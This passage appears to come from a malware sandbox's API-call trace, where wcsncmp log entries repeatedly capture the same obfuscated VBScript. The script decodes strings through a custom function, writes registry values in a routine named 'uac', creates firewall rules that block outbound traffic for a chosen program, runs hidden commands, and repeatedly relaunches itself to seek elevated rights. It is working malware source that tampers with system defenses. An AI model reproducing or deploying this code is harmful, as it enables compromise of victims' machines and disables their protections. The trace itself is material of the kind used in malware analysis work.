newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.003] wcsncmp (_String1="e.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.003] wcsncmp (_String1=".Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.004] wcsncmp (_String1="Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0223.004] wcsncmp (_String1="ame, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf 